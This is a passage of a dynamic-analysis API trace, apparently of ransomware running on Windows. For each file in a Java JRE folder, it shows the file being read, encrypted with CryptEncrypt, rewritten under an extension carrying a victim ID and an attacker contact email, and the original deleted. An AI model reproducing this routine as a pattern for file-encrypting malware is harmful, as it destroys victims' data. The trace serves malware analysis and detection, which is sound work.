CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xec50, dwBufLen=0xec50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xec50) returned 1 [0152.204] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xec50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xec50, lpOverlapped=0x0) returned 1 [0152.205] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3330) returned 1 [0152.205] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.205] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30, dwBufLen=0x30 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30) returned 1 [0152.205] CryptDestroyKey (hKey=0xac3330) returned 1 [0152.205] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xe2, lpOverlapped=0x0) returned 1 [0152.205] CryptDestroyKey (hKey=0xac3070) returned 1 [0152.205] CloseHandle (hObject=0x2ec) returned 1 [0152.205] CloseHandle (hObject=0x2e0) returned 1 [0152.206] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll")) returned 1 [0152.207] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.207] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0152.207] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=19008) returned 1 [0152.207] CloseHandle (hObject=0x2e0) returned 1 [0152.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll")) returned 0x20 [0152.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0152.208] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.208] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0152.208] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac31b0) returned 1 [0152.208] CryptSetKeyParam (hKey=0xac31b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.208] ReadFile (in: hFile=0x2e0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4a40, lpOverlapped=0x0) returned 1 [0152.210] CryptEncrypt (in: hKey=0xac31b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4a50, dwBufLen=0x4a50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4a50) returned 1 [0152.210] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4a50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4a50, lpOverlapped=0x0) returned 1 [0152.211] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2e70) returned 1 [0152.211] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.211] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30, dwBufLen=0x30 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30) returned 1 [0152.211] CryptDestroyKey (hKey=0xac2e70) returned 1 [0152.211] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xe2, lpOverlapped=0x0) returned 1 [0152.211] CryptDestroyKey (hKey=0xac31b0) returned 1 [0152.211] CloseHandle (hObject=0x2e0) returned 1 [0152.211] CloseHandle (hObject=0x2ec) returned 1 [0152.211] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll")) returned 1 [0152.212] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0152.213] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16448) returned 1 [0152.213] CloseHandle (hObject=0x2ec) returned 1 [0152.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe")) returned 0x20 [0152.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0152.213] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.213] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0152.213] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3030) returned 1 [0152.213] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.214] ReadFile (in: hFile=0x2ec, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4040, lpOverlapped=0x0) returned 1 [0152.215] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050) returned 1 [0152.215] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4050, lpOverlapped=0x0) returned 1 [0152.216] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3070) returned 1 [0152.216] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.216] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0152.216] CryptDestroyKey (hKey=0xac3070) returned 1 [0152.216] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0152.217] CryptDestroyKey (hKey=0xac3030) returned 1 [0152.217] CloseHandle (hObject=0x2ec) returned 1 [0152.217] CloseHandle (hObject=0x2e0) returned 1 [0152.217] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe")) returned 1 [0152.218] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0152.218] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16448) returned 1 [0152.218] CloseHandle (hObject=0x2e0) returned 1 [0152.218] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe")) returned 0x20 [0152.218] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0152.218] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.218] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0152.219] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3370) returned 1 [0152.219] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.219] ReadFile (in: hFile=0x2e0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4040, lpOverlapped=0x0) returned 1 [0152.309] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050) returned 1 [0152.309] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4050, lpOverlapped=0x0) returned 1 [0152.310] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac30b0) returned 1 [0152.310] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.310] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0152.310] CryptDestroyKey (hKey=0xac30b0) returned 1 [0152.310] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0152.311] CryptDestroyKey (hKey=0xac3370) returned 1 [0152.311] CloseHandle (hObject=0x2e0) returned 1 [0152.311] CloseHandle (hObject=0x2ec) returned 1 [0152.311] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe")) returned 1 [0152.581] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.582] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=234560) returned 1 [0152.582] CloseHandle (hObject=0x2f8) returned 1 [0152.583] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll")) returned 0x20 [0152.583] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.583] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.583] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.583] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.583] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.583] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3370) returned 1 [0152.583] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.583] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x39440, lpOverlapped=0x0) returned 1 [0152.589] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x39450, dwBufLen=0x39450 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x39450) returned 1 [0152.590] WriteFile (in: hFile=0x2dc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x39450, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x39450, lpOverlapped=0x0) returned 1 [0152.594] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac30b0) returned 1 [0152.594] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.594] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0152.594] CryptDestroyKey (hKey=0xac30b0) returned 1 [0152.594] WriteFile (in: hFile=0x2dc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0152.594] CryptDestroyKey (hKey=0xac3370) returned 1 [0152.594] CloseHandle (hObject=0x2f8) returned 1 [0152.594] CloseHandle (hObject=0x2dc) returned 1 [0152.594] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll")) returned 1 [0152.597] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.597] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16448) returned 1 [0152.597] CloseHandle (hObject=0x2dc) returned 1 [0152.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe")) returned 0x20 [0152.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.597] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.597] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.598] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3370) returned 1 [0152.598] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.598] ReadFile (in: hFile=0x2dc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4040, lpOverlapped=0x0) returned 1 [0152.600] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050) returned 1 [0152.600] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4050, lpOverlapped=0x0) returned 1 [0152.601] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2ff0) returned 1 [0152.601] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.601] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0152.601] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0152.601] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0152.601] CryptDestroyKey (hKey=0xac3370) returned 1 [0152.601] CloseHandle (hObject=0x2dc) returned 1 [0152.601] CloseHandle (hObject=0x2f8) returned 1 [0152.601] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe")) returned 1 [0152.602] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.602] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.603] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=57408) returned 1 [0152.603] CloseHandle (hObject=0x2f8) returned 1 [0152.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll")) returned 0x20 [0152.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.603] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.603] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.603] CreateFileW 